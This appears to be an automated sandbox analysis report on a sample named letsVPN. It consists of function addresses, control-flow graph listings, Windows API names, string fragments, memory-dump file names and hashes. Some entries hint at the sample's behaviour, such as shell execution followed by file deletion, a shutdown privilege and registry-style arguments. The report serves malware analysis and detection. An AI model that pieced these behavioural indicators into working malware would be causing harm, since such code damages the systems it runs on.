2 call 180002270 call 18000310c Sleep call 180002270 * 4 call 18000310c DeleteFileW * 3 call 180004df0 * 14 call 18000286c call 18000e8b0 call 180004df0 call 180004e58 call 180012200 475->477 476->477 478 180006680 call 1800103cc 476->478 478->477
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide$FolderFromListLocationPathSpecial
                                                                                                                                                                                                    • String ID: 1.0.$Dele$Shel$cute$lExe$leW$teFi$~16
                                                                                                                                                                                                    • API String ID: 790480582-1993818955
                                                                                                                                                                                                    • Opcode ID: ac54990aac95bf2d28a7a146e9c6009a6d1eeca20118406b1ef1424830b8656c
                                                                                                                                                                                                    • Instruction ID: be1e63a572210f39efd37311244dc54493d0b04b1b8e40341aa798d8d538536b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac54990aac95bf2d28a7a146e9c6009a6d1eeca20118406b1ef1424830b8656c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37821872211BC88AE7B2DF20DC947DD33A5F74938CF809125EA494BAAADF758748C744
                                                                                                                                                                                                    Function 000000018000310C Relevance: 21.4, APIs: 14, Instructions: 411memorycomCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 794 18000310c-1800031de CoInitialize CoImpersonateClient CoInitializeSecurity call 1800113f0 call 18000547c call 180003754 801 1800031e3-1800031f8 call 180002f78 794->801 802 1800031e0 794->802 805 1800031fa 801->805 806 1800031fd-18000320e CLSIDFromProgID 801->806 802->801 805->806 807 180003219-180003230 806->807 808 180003210-180003214 call 18000eaf0 806->808 810 180003232-180003236 call 18000eaf0 807->810 811 18000323b-180003263 CoCreateInstance 807->811 808->807 810->811 813 180003269-1800032b5 VariantInit call 1800113f0 call 18000547c call 180003754 811->813 814 1800036aa-1800036b9 CoUninitialize 811->814 838 1800032b7 813->838 839 1800032ba-1800032ca call 180002f78 813->839 816 1800036c2-1800036c6 814->816 817 1800036bb-1800036c1 814->817 819 1800036c8-1800036cb call 18000eaf0 816->819 820 1800036d0-1800036e1 816->820 817->816 819->820 824 1800036e3-1800036e7 call 18000eaf0 820->824 825 1800036ec-1800036ff 820->825 824->825 826 180003701-180003704 call 18000eaf0 825->826 827 180003709-180003719 825->827 826->827 831 180003723 827->831 832 18000371b-18000371e call 18000eaf0 827->832 835 180003727-180003751 call 180012200 831->835 832->831 838->839 843 1800032cc 839->843 844 1800032cf-1800032f9 839->844 843->844 845 180003303-180003307 844->845 846 180003309-18000331b call 180003ad0 845->846 847 18000331d-180003321 845->847 846->847 849 180003323-180003327 call 18000eaf0 847->849 850 18000332c-180003342 847->850 849->850 853 180003344-180003348 call 18000eaf0 850->853 854 18000334d-18000334f 850->854 853->854 856 180003351-180003359 854->856 857 18000337a-18000338b 854->857 858 180003362-180003366 856->858 859 18000335b-180003361 856->859 860 180003397-1800033e3 VariantInit call 1800113f0 call 18000547c call 180003754 857->860 861 18000338d-180003396 857->861 862 180003368-18000336b call 18000eaf0 858->862 863 180003370-180003375 858->863 859->858 873 1800033e5 860->873 874 1800033e8-1800033f8 call 180002f78 860->874 861->860 862->863 863->820 873->874 877 1800033fa 874->877 878 1800033fd-180003433 874->878 877->878 880 180003435-180003445 call 180003ad0 878->880 881 180003447-18000344c 878->881 880->881 883 180003457-18000346d 881->883 884 18000344e-180003452 call 18000eaf0 881->884 885 180003478-18000347a 883->885 886 18000346f-180003473 call 18000eaf0 883->886 884->883 890 18000350f-180003520 885->890 891 180003480-180003492 885->891 886->885 892 180003522-18000352b 890->892 893 18000352c-180003535 890->893 896 180003494-18000349a 891->896 897 18000349b-1800034a4 891->897 892->893 895 180003538-18000354d VariantInit 893->895 895->895 899 18000354f-180003556 895->899 896->897 900 1800034a6-1800034a9 call 18000eaf0 897->900 901 1800034ae-1800034c4 897->901 902 180003558-18000355b 899->902 903 18000355d 899->903 900->901 907 1800034c6-1800034ca call 18000eaf0 901->907 908 1800034cf-1800034e2 901->908 904 180003560-18000356f SysAllocString 902->904 903->904 909 180003571-180003575 904->909 910 180003577 904->910 907->908 911 1800034e4-1800034e7 call 18000eaf0 908->911 912 1800034ec-1800034fc 908->912 914 18000357a-180003588 SysAllocString 909->914 910->914 911->912 916 180003506-18000350a 912->916 917 1800034fe-180003501 call 18000eaf0 912->917 918 18000358a-18000358d 914->918 919 18000358f 914->919 916->835 917->916 921 180003592-1800035a0 SysAllocString 918->921 919->921 922 1800035a2-1800035a5 921->922 923 1800035a7 921->923 924 1800035aa-1800035fc SysAllocString call 1800113f0 call 18000547c call 180003754 922->924 923->924 931 180003601-180003611 call 180002f78 924->931 932 1800035fe 924->932 935 180003613 931->935 936 180003616-18000363b call 180003c44 931->936 932->931 935->936 939 180003646-18000365c 936->939 940 18000363d-180003641 call 18000eaf0 936->940 942 180003667-18000366b 939->942 943 18000365e-180003662 call 18000eaf0 939->943 940->939 945 180003670-180003680 VariantClear 942->945 943->942 945->945 946 180003682-18000368d 945->946 947 180003699-1800036a7 946->947 948 18000368f-180003698 946->948 947->814 948->947
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocStringVariant$Init$Initialize$ClearClientCreateFromImpersonateInstanceProgSecurityUninitialize
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3828289656-0
                                                                                                                                                                                                    • Opcode ID: 88380749b9bff7f02a8bd9b5a1ef2fd6c32f40a06c4a83a00ea0faaacdf54457
                                                                                                                                                                                                    • Instruction ID: 8df9d348843d8f77737215da8969992bce2adc21e39d041bec8d82088d120d47
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88380749b9bff7f02a8bd9b5a1ef2fd6c32f40a06c4a83a00ea0faaacdf54457
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4126C32204B4885EB52DF61E8893DE77B8F789BC8F418025EE4A57BA5DF74C658C380
                                                                                                                                                                                                    Function 0000000180003848 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 64sleepCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesSleepValue_beginthreadex
                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                    • API String ID: 1138004472-3733053543
                                                                                                                                                                                                    • Opcode ID: d8da6024658c722b646910c3d96e45045ea0514b14bdfe8c575e50fea09f0569
                                                                                                                                                                                                    • Instruction ID: 7900f27b0b5eabe5c36217b302caede7b5b8c6614703a535c2948af9343980a6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8da6024658c722b646910c3d96e45045ea0514b14bdfe8c575e50fea09f0569
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41313C72B10B098AF792CFB1D8453ED37B4F74C79DF048426EA0AA6658DF78C2498750
                                                                                                                                                                                                    Function 0000000180006940 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: GlobalInfoMemoryStatusSystem
                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                    • API String ID: 248183744-2766056989
                                                                                                                                                                                                    • Opcode ID: 6ab1be835e954898ebdeb28ed991f5560ea1e6b52a6b1bd78a8faee3408ec2ef
                                                                                                                                                                                                    • Instruction ID: 831fc52dc961fc22b003951347bb0d9f027577d0a48d1bea24d334a4d92bd93f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ab1be835e954898ebdeb28ed991f5560ea1e6b52a6b1bd78a8faee3408ec2ef
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6F01236618A8487FBA1DB60E4663AEB361F7CD794F814515E68E41A55DF7CC21CCB00
                                                                                                                                                                                                    Function 000000018000CA80 Relevance: 4.6, APIs: 3, Instructions: 93fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Pointer$Create
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 250661774-0
                                                                                                                                                                                                    • Opcode ID: 58049fbec35e7c4634dedcbb9b83f674b4bc32b06552d7332aa69889d7d14782
                                                                                                                                                                                                    • Instruction ID: fc990ef4cf880642924757aab6ab0feee7337a1683e05dbc252286eedef122ed
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58049fbec35e7c4634dedcbb9b83f674b4bc32b06552d7332aa69889d7d14782
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E631F6336187588AE362CF26A440B9E7FA1F388BD0F658215EF5503B90DF39C649C741
                                                                                                                                                                                                    Function 00000001800244FA Relevance: 35.3, APIs: 19, Strings: 1, Instructions: 346COMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 535 1800244fa-1800246d6 call 18001eaac call 180024290 554 180024769-180024774 GetFileType 535->554 555 1800247c2-18002482f call 18001edc4 554->555 560 180024835-180024838 555->560 561 1800248bc-1800248bf 555->561 562 180024ad7 560->562 563 18002483e-180024841 560->563 561->562 564 1800248c5-1800248d3 561->564 565 180024adb 562->565 563->561 566 180024843-180024859 call 1800183b4 563->566 567 1800248e3-1800248ea 564->567 568 1800248d5-1800248db 564->568 574 180024ae1-180024b30 565->574 581 180024874-18002488b call 18001f1d4 566->581 582 180024868-1800248a2 call 180016e44 566->582 572 180024928 567->572 573 1800248ec-1800248f9 567->573 570 1800248e1 568->570 571 1800248dd-1800248df 568->571 570->567 571->567 580 18002492c-180024932 572->580 576 180024915-180024920 573->576 577 1800248fb-180024903 573->577 578 180024b53-180024b5f 574->578 579 180024b32-180024b36 574->579 576->580 583 180024922-180024926 576->583 577->583 584 180024905-18002490d 577->584 587 180024b65-180024b68 578->587 588 180024bfb 578->588 579->578 586 180024b38-180024b4e 579->586 580->562 585 180024938-180024943 580->585 602 1800248a4-1800248b4 call 1800183b4 581->602 603 18002488d-180024892 581->603 582->602 583->580 584->580 592 18002490f-180024913 584->592 585->565 593 180024949-180024958 585->593 586->578 587->588 589 180024b6e-180024bab call 18002a060 call 180024290 587->589 595 180024bfd 588->595 626 180024be1-180024bf7 589->626 627 180024bad-180024bd7 call 18002a030 call 180015d78 call 18001eca4 589->627 592->580 598 180024a5c-180024a5f 593->598 599 18002495e-180024963 593->599 595->595 598->565 601 180024a61-180024a64 598->601 604 1800249d5-1800249e9 call 18001f1d4 599->604 605 180024965-180024967 599->605 608 18002498b-180024994 601->608 609 180024a6a-180024a6e 601->609 602->582 630 1800248b6 602->630 603->602 610 180024894-180024898 603->610 604->582 624 1800249ef-1800249f2 604->624 605->565 613 18002496d-180024970 605->613 615 18002499a-18002499c 608->615 616 180024aa0-180024aa7 608->616 618 180024a74-180024a83 call 1800183b4 609->618 619 180024981-180024985 609->619 610->602 620 18002489a call 180027804 610->620 613->565 622 180024976-180024979 613->622 615->565 625 1800249a2-1800249a9 615->625 629 180024aad-180024ac7 call 180017010 616->629 618->608 637 180024a89-180024a99 call 1800183b4 618->637 619->565 619->608 620->602 622->608 623 18002497b-18002497f 622->623 623->619 631 1800249ae-1800249bd call 1800183b4 623->631 632 180024a13-180024a1c 624->632 633 1800249f4-1800249f7 624->633 625->629 626->588 664 180024bdc 627->664 629->582 648 180024acd-180024ad3 629->648 630->561 631->608 655 1800249bf-1800249cf call 1800183b4 631->655 639 180024a38-180024a3d 632->639 640 180024a1e-180024a33 call 180016e44 call 180015dc8 632->640 633->637 638 1800249fd-180024a04 633->638 637->565 657 180024a9b 637->657 638->632 644 180024a06-180024a0e 638->644 639->637 650 180024a3f-180024a50 call 1800183b4 639->650 640->588 644->574 648->629 654 180024ad5 648->654 650->582 662 180024a56-180024a5a 650->662 654->565 655->582 655->604 657->582 662->565 664->664
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: p^f
                                                                                                                                                                                                    • API String ID: 0-727254517
                                                                                                                                                                                                    • Opcode ID: 51f9b2731b5c0c3c81ca969c26c7ffe3da710bf57b20caf7dcc85b9a83dc375f
                                                                                                                                                                                                    • Instruction ID: 2bc004255d4dc64879280be8e809554ba150f91c78f1042ec411c1203a364a17
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51f9b2731b5c0c3c81ca969c26c7ffe3da710bf57b20caf7dcc85b9a83dc375f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4CE1C633B10A5846FBA7CA78C4943EC27A1A749BE8F14C215FE2A5B7D5CE78C649C701
                                                                                                                                                                                                    Function 0000000180006B28 Relevance: 25.0, APIs: 8, Strings: 6, Instructions: 451stringsleepfileCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 666 180006b28-180006b97 call 1800111b0 call 180003948 671 180006b99 666->671 672 180006b9c-180006bd4 call 180002f78 wsprintfW 666->672 671->672 675 180006bd6-180006bda call 18000eaf0 672->675 676 180006bdf-180006bf4 672->676 675->676 678 180006bf6-180006bfa call 18000eaf0 676->678 679 180006bff-180007044 SHGetSpecialFolderPathW lstrcatW * 3 call 1800103cc call 180005638 call 1800018e4 call 1800016d0 * 5 676->679 678->679 697 180007046-18000704a call 18000eaf0 679->697 698 18000704f-180007064 679->698 697->698 700 180007066-18000706a call 18000eaf0 698->700 701 18000706f-18000707f 698->701 700->701 703 180007081-180007085 call 18000eaf0 701->703 704 18000708a-18000709a 701->704 703->704 706 1800070a5-1800070b5 704->706 707 18000709c-1800070a0 call 18000eaf0 704->707 709 1800070b7-1800070bb call 18000eaf0 706->709 710 1800070c0-18000714f call 1800018e4 call 1800016d0 * 5 706->710 707->706 709->710 724 180007151-180007158 call 18000eaf0 710->724 725 18000715d-180007179 710->725 724->725 727 180007187-1800071a3 725->727 728 18000717b-180007182 call 18000eaf0 725->728 730 1800071b1-1800071ca 727->730 731 1800071a5-1800071ac call 18000eaf0 727->731 728->727 733 1800071d5-1800071e5 730->733 734 1800071cc-1800071d0 call 18000eaf0 730->734 731->730 735 1800071e7-1800071eb call 18000eaf0 733->735 736 1800071f0-180007273 call 1800018e4 call 1800016d0 * 5 733->736 734->733 735->736 751 180007275-180007279 call 18000eaf0 736->751 752 18000727e-18000728e 736->752 751->752 754 180007299-1800072a9 752->754 755 180007290-180007294 call 18000eaf0 752->755 757 1800072b4-1800072c4 754->757 758 1800072ab-1800072af call 18000eaf0 754->758 755->754 760 1800072c6-1800072ca call 18000eaf0 757->760 761 1800072cf-1800072df 757->761 758->757 760->761 763 1800072e1-1800072e5 call 18000eaf0 761->763 764 1800072ea-180007329 call 180001748 call 18000167c 761->764 763->764 770 180007334-180007402 call 1800084d0 call 1800111b0 ShellExecuteExW Sleep DeleteFileW 764->770 771 18000732b-18000732f call 18000eaf0 764->771 777 180007404-18000740b call 18000eaf0 770->777 778 180007410-18000742c 770->778 771->770 777->778 780 18000743a-180007456 778->780 781 18000742e-180007435 call 18000eaf0 778->781 783 180007464-180007480 780->783 784 180007458-18000745f call 18000eaf0 780->784 781->780 786 180007482-180007489 call 18000eaf0 783->786 787 18000748e-1800074aa 783->787 784->783 786->787 789 1800074b8-1800074e7 call 180012200 787->789 790 1800074ac-1800074b3 call 18000eaf0 787->790 790->789
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: lstrcat$DeleteExecuteFileFolderPathShellSleepSpecialwsprintf
                                                                                                                                                                                                    • String ID: /F $ /d 0$ /t $ /v $@$p
                                                                                                                                                                                                    • API String ID: 2901320441-719673316
                                                                                                                                                                                                    • Opcode ID: e57dd66678158338e5c2a573c4aa2a2db4ed1e9dcfa8cee3a4322f6ea663ef52
                                                                                                                                                                                                    • Instruction ID: 651b5840f91052aa65d2ad8009e727a2fa45a5703b0bebf71695ec9b55f461a3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e57dd66678158338e5c2a573c4aa2a2db4ed1e9dcfa8cee3a4322f6ea663ef52
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5420772211AC4DDE761DF61DC883CD37A5F74978CF40811AEA095BAAACFB58788C744
                                                                                                                                                                                                    Function 000000018001F2B6 Relevance: 18.2, APIs: 12, Instructions: 198COMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 951 18001f2b6-18001f2b8 952 18001f2c5-18001f345 951->952 953 18001f2ba-18001f2c0 951->953 957 18001f3eb-18001f3f5 call 18001eea0 952->957 958 18001f34b-18001f353 952->958 955 18001f2c2 953->955 956 18001f26f-18001fa2b call 180015d58 call 180015dc8 953->956 955->952 977 18001fa30 956->977 978 18001fa2b call 180016cfc 956->978 968 18001f47b-18001f49d call 18002a0e0 957->968 969 18001f3fb-18001f410 957->969 958->957 960 18001f359-18001f35b 958->960 960->957 963 18001f361-18001f382 960->963 963->957 966 18001f384-18001f394 963->966 966->957 970 18001f396-18001f398 966->970 976 18001f4a3-18001f4bc 968->976 969->968 973 18001f412-18001f425 GetConsoleMode 969->973 970->957 975 18001f39a-18001f3b8 970->975 973->968 974 18001f427-18001f42b 973->974 974->968 979 18001f42d-18001f459 ReadConsoleW 974->979 975->957 981 18001f3ba-18001f3ca 975->981 988 18001f4c2-18001f516 976->988 980 18001fa33-18001fa43 977->980 978->977 983 18001f45b-18001f81a call 18002a030 call 180015d78 979->983 984 18001f470-18001f479 979->984 981->957 985 18001f3cc-18001f3ce 981->985 999 18001f81e-18001f821 983->999 984->988 985->957 989 18001f3d0-18001f3e6 985->989 1000 18001f51c 988->1000 1001 18001f64f-18001f766 call 18002a0b8 call 18002a030 call 180015d78 988->1001 989->957 1002 18001f823-18001f826 call 180011058 999->1002 1003 18001f82b-18001f833 999->1003 1004 18001f521-18001f624 1000->1004 1001->999 1002->1003 1003->980 1013 18001f62a 1004->1013 1013->1001
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Console$ErrorLastModeRead_dosmaperr_errno_invalid_parameter_noinfo_isattyfree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 639220483-0
                                                                                                                                                                                                    • Opcode ID: d0f936255b772f8851bf327234b759f4c765ae817f55f27dd371c1f47404f38e
                                                                                                                                                                                                    • Instruction ID: c1d9a7f71fe635e91277f200afcf5601e3f89b246ca9184b7b0d443f31df1227
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0f936255b772f8851bf327234b759f4c765ae817f55f27dd371c1f47404f38e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F881F032605E4846FBB39B6994847FD2BA1F749BD8F59C205EE5A433D1DE24CA1EC310
                                                                                                                                                                                                    Function 000000018000A40A Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 192COMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1021 18000a40a-18000a411 1022 18000a413-18000a418 1021->1022 1023 18000a41d-18000a421 1021->1023 1024 18000a744-18000a76e call 180012200 1022->1024 1025 18000a423-18000a426 call 18000cdd4 1023->1025 1026 18000a42b-18000a435 1023->1026 1025->1026 1026->1022 1029 18000a437-18000a43a 1026->1029 1031 18000a44b-18000a451 1029->1031 1032 18000a43c-18000a441 call 18000ceac 1029->1032 1033 18000a443-18000a446 call 18000cf08 1031->1033 1034 18000a453-18000a469 call 180009bbc 1031->1034 1032->1031 1033->1031 1040 18000a4ab-18000a4b1 1034->1040 1041 18000a46b-18000a46f 1034->1041 1042 18000a4b7-18000a4c1 1040->1042 1043 18000a5cb-18000a5cf 1040->1043 1044 18000a725-18000a727 1041->1044 1045 18000a475-18000a47a 1041->1045 1046 18000a4da-18000a4dd 1042->1046 1047 18000a5d1-18000a5d6 1043->1047 1048 18000a5db-18000a5f7 call 18000cf88 1043->1048 1044->1024 1049 18000a49c 1045->1049 1050 18000a47c-18000a481 1045->1050 1051 18000a4c3-18000a4c7 1046->1051 1052 18000a4df-18000a4f1 call 18001285c 1046->1052 1047->1024 1065 18000a608-18000a624 call 18000d334 1048->1065 1066 18000a5f9-18000a601 call 18000eb24 1048->1066 1055 18000a49e-18000a4a6 call 180009a9c 1049->1055 1050->1049 1054 18000a483-18000a489 1050->1054 1056 18000a4c9-18000a4cd 1051->1056 1057 18000a4cf 1051->1057 1068 18000a4f3-18000a4fa 1052->1068 1069 18000a4fc-18000a50e 1052->1069 1060 18000a493-18000a49a 1054->1060 1061 18000a48b-18000a491 1054->1061 1055->1044 1056->1057 1063 18000a4d3-18000a4d7 1056->1063 1057->1063 1060->1055 1061->1049 1061->1060 1063->1046 1077 18000a686 1065->1077 1078 18000a626-18000a628 1065->1078 1066->1065 1072 18000a53e-18000a56b wsprintfW 1068->1072 1073 18000a514-18000a527 1069->1073 1074 18000a76f-18000a790 call 180012780 call 18000a794 1069->1074 1079 18000a58d-18000a5c8 call 180009a9c CreateFileW 1072->1079 1081 18000a529-18000a52d 1073->1081 1082 18000a56d-18000a58b wsprintfW 1073->1082 1087 18000a68b-18000a68f 1077->1087 1083 18000a658-18000a65d 1078->1083 1084 18000a62a 1078->1084 1079->1043 1081->1082 1088 18000a52f-18000a532 1081->1088 1082->1079 1083->1087 1089 18000a62c-18000a64b WriteFile 1084->1089 1090 18000a64d-18000a652 1084->1090 1093 18000a691-18000a694 call 18002a060 1087->1093 1094 18000a69a-18000a6a4 call 18000cdd4 1087->1094 1088->1072 1095 18000a534-18000a53c 1088->1095 1089->1090 1096 18000a65f-18000a664 1089->1096 1097 18000a654-18000a656 1090->1097 1098 18000a666-18000a684 SetFileTime 1090->1098 1093->1094 1094->1024 1095->1072 1095->1082 1096->1087 1097->1065 1097->1083 1098->1087
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: %s%s$%s%s%s$:
                                                                                                                                                                                                    • API String ID: 0-3034790606
                                                                                                                                                                                                    • Opcode ID: 755bd59cc5d153306aa08bcc3e5d8fccac77097dabe209a2a7d026265034d99e
                                                                                                                                                                                                    • Instruction ID: 14882d1e0d26957d55fa102c130c097a1d26e38a24c7715c8a635e70eca5937d
